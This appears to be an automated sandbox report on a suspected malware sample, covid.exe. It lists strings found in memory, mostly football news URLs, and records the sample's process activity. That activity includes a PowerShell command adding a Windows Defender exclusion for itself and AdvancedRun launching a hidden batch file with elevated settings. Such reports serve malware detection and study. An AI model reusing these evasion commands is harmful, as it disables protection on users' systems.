Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: covid.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FF2780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCEF8
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: covid.exe | Static PE information: invalid certificate
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: covid.exe, 00000000.00000000.229590420.0000000000462000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: covid.exe | Binary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: classification engine | Classification label: mal68.evad.winEXE@15/17@1/2
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec
Source: covid.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\covid.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: covid.exe | Virustotal: Detection: 40%
Source: covid.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\covid.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: covid.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb | source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: covid.exe | Static PE information: 0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret 5_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret 5_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B50D push ecx; ret 5_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret 7_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret 7_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\covid.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
